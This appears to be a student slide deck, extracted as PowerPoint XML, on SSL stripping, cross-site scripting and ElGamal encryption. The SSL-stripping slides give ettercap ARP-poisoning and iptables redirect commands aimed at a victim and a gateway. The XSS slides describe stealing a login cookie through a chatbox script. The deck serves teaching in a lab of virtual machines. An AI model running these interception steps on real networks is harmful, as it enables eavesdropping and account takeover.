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0" r:id="rId7"/>
    <p:sldId id="271" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="270" r:id="rId10"/>
    <p:sldId id="269" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="26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87774" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="46" d="100"/>
          <a:sy n="46" d="100"/>
        </p:scale>
        <p:origin x="1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249C-831E-44FD-BD1B-A2FE933781B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A4B3-28C9-42BE-A2D8-ACE07299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An interface to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Netfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> firewall that is built in to the Linux kernel. It provides an administrator with a simple interface to add remove or modify packet rules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7A4B3-28C9-42BE-A2D8-ACE0729937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Kerschel James &amp; Gerard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Rique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ElGamal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ElGamal is a public-key cryptosystem technique designed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Taher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> ElGamal in 1985. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The security of this algorithm depends on the difficulty of computing discrete logs a large prime modulus.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538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Generation Algorithm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Select a large prime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Select a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that is a primitive element modulo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Select a private key d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Compute the public key e as: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Private key is d and public key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70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Encryption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2896" y="2512060"/>
                <a:ext cx="9510275" cy="3416300"/>
              </a:xfrm>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>Generate a random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Compute two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cipher text is constructed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sent to the communicating party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2896" y="2512060"/>
                <a:ext cx="9510275" cy="3416300"/>
              </a:xfrm>
              <a:blipFill>
                <a:blip r:embed="rId2"/>
                <a:stretch>
                  <a:fillRect l="-12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93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Generation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43" y="2263515"/>
            <a:ext cx="7763868" cy="3564256"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15970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041" y="532286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Encryption Implementation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4" y="2413416"/>
            <a:ext cx="10926910" cy="2792127"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27682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658" y="516551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Decryption Implementation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10" y="2008683"/>
            <a:ext cx="10318458" cy="3916388"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21901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835" y="2735841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SSL stripping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Ssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> stripping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2" y="1128451"/>
            <a:ext cx="8420393" cy="535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382" y="2286001"/>
            <a:ext cx="10418618" cy="3593591"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>echo 1 &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/sys/net/ipv4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ip_forward</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> – enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>forwarding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> –t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>-A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>PREROUTING –p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>--destination-port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>-j </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>REDIRECT- -to-port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>10000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>route –n – find your gateway</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Tq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>arp:remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> eth0 –S /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>victimsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>// /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>gatewayip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>//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slstrip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Ettercap does SSL stripping on the browser but only works on old browsers such as IE. We used VM’s in order to illustrate this. Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was used for the hacking and Windows XP as another machine with an old version of IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. This attack will not work on up to date browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - An interface to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> firewall that is built in to the Linux kernel. It provides an administrator with a simple interface to add remove or modify packet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0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Cross-site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>) refers to client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web 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074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created a website with the vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The website allows a user to login using their credentials then a cookie is created for them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>After they are logged in they can then go chatting with other persons online</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Inside the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>chatbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> a user can then insert a script that would take the user’s cookie and save it on their website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The attacker can then use their cookie to log into their account.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03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977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748</TotalTime>
  <Words>363</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>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Impact</vt:lpstr>
      <vt:lpstr>Badge</vt:lpstr>
      <vt:lpstr>Hacking</vt:lpstr>
      <vt:lpstr>SSL stripping</vt:lpstr>
      <vt:lpstr>Ssl stripping</vt:lpstr>
      <vt:lpstr>Commands</vt:lpstr>
      <vt:lpstr>Explanation</vt:lpstr>
      <vt:lpstr>Cross site scripting</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>ELgamal</vt:lpstr>
      <vt:lpstr>ElGamal</vt:lpstr>
      <vt:lpstr>Key Generation Algorithm </vt:lpstr>
      <vt:lpstr>Encryption Algorithm</vt:lpstr>
      <vt:lpstr>Key Generation Code</vt:lpstr>
      <vt:lpstr>Encryption Implementation </vt:lpstr>
      <vt:lpstr>Decryption Implementation </vt:lpstr>
      <vt:lpstr>The end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Kerschel James</dc:creator>
  <cp:lastModifiedBy>Kerschel James</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-04T11:11:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-05T22:20:51Z</dcterms:modified>
</cp:coreProperties>
</file>